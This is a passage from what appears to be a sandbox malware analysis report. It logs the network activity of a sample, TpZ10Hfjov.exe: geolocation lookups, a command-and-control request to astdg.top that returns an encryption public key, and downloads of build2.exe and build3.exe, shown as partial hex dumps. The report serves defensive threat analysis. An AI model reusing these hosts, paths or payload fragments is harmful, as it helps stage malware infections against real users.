                                                                                                                                                                            Aug 3, 2021 19:00:29.201442957 CEST192.168.2.48.8.8.80x675bStandard query (0)api.2ip.uaA (IP address)IN (0x0001)

                                                                                                                                                                            DNS Answers

                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                            Aug 3, 2021 19:00:06.988425970 CEST8.8.8.8192.168.2.40xecc1No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:12.903327942 CEST8.8.8.8192.168.2.40xf581No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST8.8.8.8192.168.2.40x105bNo error (0)astdg.top31.167.180.141A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST8.8.8.8192.168.2.40x105bNo error (0)astdg.top95.104.121.111A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST8.8.8.8192.168.2.40x105bNo error (0)astdg.top109.102.255.230A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST8.8.8.8192.168.2.40x105bNo error (0)astdg.top61.98.7.133A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST8.8.8.8192.168.2.40x105bNo error (0)astdg.top93.112.179.248A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST8.8.8.8192.168.2.40x105bNo error (0)astdg.top61.253.197.172A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST8.8.8.8192.168.2.40x105bNo error (0)astdg.top151.251.16.197A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST8.8.8.8192.168.2.40x105bNo error (0)astdg.top181.129.180.251A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST8.8.8.8192.168.2.40x105bNo error (0)astdg.top152.171.10.3A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST8.8.8.8192.168.2.40x105bNo error (0)astdg.top217.156.87.2A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST8.8.8.8192.168.2.40x95d1No error (0)securebiz.org187.170.252.73A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST8.8.8.8192.168.2.40x95d1No error (0)securebiz.org186.145.238.42A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST8.8.8.8192.168.2.40x95d1No error (0)securebiz.org190.219.118.147A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST8.8.8.8192.168.2.40x95d1No error (0)securebiz.org187.156.128.15A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST8.8.8.8192.168.2.40x95d1No error (0)securebiz.org61.253.197.172A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST8.8.8.8192.168.2.40x95d1No error (0)securebiz.org84.40.106.91A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST8.8.8.8192.168.2.40x95d1No error (0)securebiz.org109.102.255.230A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST8.8.8.8192.168.2.40x95d1No error (0)securebiz.org138.36.3.134A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST8.8.8.8192.168.2.40x95d1No error (0)securebiz.org179.177.53.233A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST8.8.8.8192.168.2.40x95d1No error (0)securebiz.org211.53.230.69A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:14.912158966 CEST8.8.8.8192.168.2.40xc162No error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:22.735254049 CEST8.8.8.8192.168.2.40x52b2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:24.098614931 CEST8.8.8.8192.168.2.40xf2eeNo error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:29.237255096 CEST8.8.8.8192.168.2.40x675bNo error (0)api.2ip.ua77.123.139.190A (IP address)IN (0x0001)

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • astdg.top
                                                                                                                                                                            • securebiz.org

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            0192.168.2.44974231.167.180.14180C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Aug 3, 2021 19:00:13.645867109 CEST1171OUTGET /fhsgtsspen6/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                                                                                            User-Agent: Microsoft Internet Explorer
                                                                                                                                                                            Host: astdg.top
                                                                                                                                                                            Aug 3, 2021 19:00:13.906989098 CEST1172INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 03 Aug 2021 17:00:04 GMT
                                                                                                                                                                            Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                            X-Powered-By: PHP/5.6.40
                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 33 31 72 58 58 67 42 4e 44 6f 30 39 41 64 39 5c 2f 56 77 64 76 5c 5c 6e 31 33 49 64 79 47 77 45 30 78 63 64 44 56 71 30 78 32 4a 68 42 41 55 6f 50 6b 64 6c 6b 46 38 36 64 63 54 63 41 51 78 5c 2f 43 54 44 55 70 48 42 6e 33 75 62 71 53 70 6e 33 48 62 6f 4f 33 52 50 71 5c 5c 6e 55 65 4f 6a 75 71 31 79 6b 4c 43 4a 6c 55 6f 53 75 4f 54 35 52 74 39 6d 54 2b 79 64 6f 35 6b 59 57 6d 7a 67 30 44 33 34 66 6e 64 78 78 37 49 74 68 32 46 4b 59 36 6f 32 32 67 5a 42 51 6e 6f 4b 5c 5c 6e 58 34 49 49 63 2b 50 32 66 78 44 6f 75 37 44 4c 4e 6b 5c 2f 43 50 77 65 78 57 38 52 67 71 53 31 36 79 56 51 30 46 47 7a 58 53 61 52 43 58 73 69 62 58 46 46 35 78 61 79 4f 5c 2f 4b 64 2b 6b 76 45 31 5c 5c 6e 46 4c 79 71 6f 50 74 39 35 78 61 37 75 2b 43 37 59 74 39 33 53 72 66 6f 63 72 56 67 39 36 6f 6b 42 71 6f 56 37 6f 38 62 31 2b 76 35 72 79 68 6a 4f 63 53 6f 51 70 56 35 55 79 31 58 78 71 75 7a 5c 5c 6e 6f 64 75 51 5a 53 41 35 67 72 74 6b 57 70 47 5c 2f 46 77 31 6a 44 79 5a 74 31 77 43 38 44 30 48 6d 52 4c 74 61 66 6f 31 65 31 65 38 70 30 6d 56 76 5c 2f 72 2b 35 5c 2f 49 66 4e 30 51 53 4a 6f 58 45 54 5c 5c 6e 6d 51 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 34 32 6f 4d 50 74 4c 30 69 65 69 32 52 61 39 35 36 4a 74 41 4e 58 33 59 55 41 63 57 7a 74 50 70 46 6e 48 58 72 44 70 39 22 7d
                                                                                                                                                                            Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA31rXXgBNDo09Ad9\/Vwdv\\n13IdyGwE0xcdDVq0x2JhBAUoPkdlkF86dcTcAQx\/CTDUpHBn3ubqSpn3HboO3RPq\\nUeOjuq1ykLCJlUoSuOT5Rt9mT+ydo5kYWmzg0D34fndxx7Ith2FKY6o22gZBQnoK\\nX4IIc+P2fxDou7DLNk\/CPwexW8RgqS16yVQ0FGzXSaRCXsibXFF5xayO\/Kd+kvE1\\nFLyqoPt95xa7u+C7Yt93SrfocrVg96okBqoV7o8b1+v5ryhjOcSoQpV5Uy1Xxquz\\noduQZSA5grtkWpG\/Fw1jDyZt1wC8D0HmRLtafo1e1e8p0mVv\/r+5\/IfN0QSJoXET\\nmQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"42oMPtL0iei2Ra956JtANX3YUAcWztPpFnHXrDp9"}


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            1192.168.2.449743187.170.252.7380C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Aug 3, 2021 19:00:13.833046913 CEST1171OUTGET /dl/build2.exe HTTP/1.1
                                                                                                                                                                            User-Agent: Microsoft Internet Explorer
                                                                                                                                                                            Host: securebiz.org
                                                                                                                                                                            Aug 3, 2021 19:00:14.616005898 CEST1174INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 03 Aug 2021 17:00:14 GMT
                                                                                                                                                                            Server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                                                                                                                            Last-Modified: Tue, 03 Aug 2021 10:44:32 GMT
                                                                                                                                                                            ETag: "88200-5c8a55efa51ea"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 557568
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8d 81 1b 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 58 07 00 00 0c 85 02 00 00 00 00 86 90 06 00 00 10 00 00 00 70 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 8b 02 00 04 00 00 05 1d 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 66 07 00 6c 00 00 00 ac 59 07 00 3c 00 00 00 00 20 8b 02 88 ce 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 30 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 56 07 00 00 10 00 00 00 58 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 24 a2 83 02 00 70 07 00 00 56 00 00 00 5c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 ce 00 00 00 20 8b 02 00 d0 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 5c 07 00 20 5c 07 00 3c 5c 07 00 56 5c 07 00 6c 5c 07 00 84 5c 07 00 94 5c 07 00 a4 5c 07 00 ba 5c 07 00
                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`Xp@@flY< X0@ .textVX `.data$pV\@.rsrc @@\ \<\V\l\\\\\


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            2192.168.2.44974531.167.180.14180C:\Users\user\Desktop\TpZ10Hfjov.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Aug 3, 2021 19:00:21.498380899 CEST1763OUTGET /files/1/build3.exe HTTP/1.1
                                                                                                                                                                            User-Agent: Microsoft Internet Explorer
                                                                                                                                                                            Host: astdg.top
                                                                                                                                                                            Aug 3, 2021 19:00:22.003648996 CEST1949INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 03 Aug 2021 17:00:12 GMT
                                                                                                                                                                            Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                            Last-Modified: Fri, 30 Jul 2021 22:50:56 GMT
                                                                                                                                                                            ETag: "53c00-5c85f0d6fa061"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 343040
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-msdownload
                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 61 35 58 74 00 5b 0b 74 00 5b 0b 74 00 5b 0b 6a 52 ce 0b 61 00 5b 0b 6a 52 d8 0b 08 00 5b 0b 6a 52 df 0b 4c 00 5b 0b 53 c6 20 0b 73 00 5b 0b 74 00 5a 0b e5 00 5b 0b 6a 52 d1 0b 75 00 5b 0b 6a 52 cf 0b 75 00 5b 0b 6a 52 ca 0b 75 00 5b 0b 52 69 63 68 74 00 5b 0b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 37 c9 da 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 fa 01 00 00 ac e2 02 00 00 00 00 c0 1b 00 00 00 10 00 00 00 10 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 e4 02 00 04 00 00 e2 55 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 95 02 00 50 00 00 00 00 40 e3 02 f0 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e3 02 34 1a 00 00 60 12 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 18 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 f9 01 00 00 10 00 00 00 fa 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 91 00 00 00 10 02 00 00 92 00 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 8c e0 02 00 b0 02 00 00 12 01 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 56 00 00 00 40 e3 02 00 58 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 40 01 00 00 a0 e3 02 00 42 01 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8b ff 55 8b ec 51 8b 45 0c 50 8b 4d 08 51 ff 15 0c 11 42 00 85 c0 75 0b ff 15 08 11 42 00 89 45 fc eb 07 c7
                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0a5Xt[t[t[jRa[jR[jRL[S s[tZ[jRu[jRu[jRu[Richt[PEL7^@U`P@V4`@.textp `.rdata@@.data8@.rsrcV@X@@.reloc@B@BUQEPMQBuBE


                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                            Aug 3, 2021 19:00:07.117963076 CEST77.123.139.190443192.168.2.449733CN=*.2ip.ua CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Nov 21 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                            CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                            CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                            Aug 3, 2021 19:00:13.022995949 CEST77.123.139.190443192.168.2.449741CN=*.2ip.ua CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Nov 21 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                            CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                            CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                            Aug 3, 2021 19:00:15.069188118 CEST77.123.139.190443192.168.2.449744CN=*.2ip.ua CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Nov 21 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                            CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                            CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                            Aug 3, 2021 19:00:24.279090881 CEST77.123.139.190443192.168.2.449747CN=*.2ip.ua CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Nov 21 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                            CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
